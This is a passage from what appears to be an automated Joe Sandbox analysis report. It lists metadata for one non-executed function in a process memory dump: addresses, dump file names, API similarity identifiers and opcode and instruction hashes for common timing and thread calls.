                                                                                                                                                          • Instruction Fuzzy Hash: 2CE0ECB4706A0081FE5B8B17AC947E123B0AB9CBC0F480039AA0E0F371EB3E84958310

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00007FF791E3F7F4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000002.3347366050.00007FF791A01000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FF791A00000, based on PE: true
                                                                                                                                                          • Associated: 00000012.00000002.3346991182.00007FF791A00000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348387189.00007FF791F5C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348802165.00007FF791FA4000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348861127.00007FF791FA7000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348897695.00007FF791FAB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          • Associated: 00000012.00000002.3348954750.00007FF791FE0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_2_7ff791a00000_app_process.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                          • Opcode ID: 7c4c42bf022f1d95684a38cd7526c40398a2ddc7fb0ff33f78299e85158657c0
                                                                                                                                                          • Instruction ID: d862ab69570fb393247bf12a49ce0ebd2995e361177c2f40a0e8fb3f0ebcda5c
                                                                                                                                                          • Opcode Fuzzy Hash: 7c4c42bf022f1d95684a38cd7526c40398a2ddc7fb0ff33f78299e85158657c0
                                                                                                                                                          • Instruction Fuzzy Hash: A8118C36B05B058AEB10AF70E8542B873A0FB09758F841A30EA2D427A4DFBCD0648350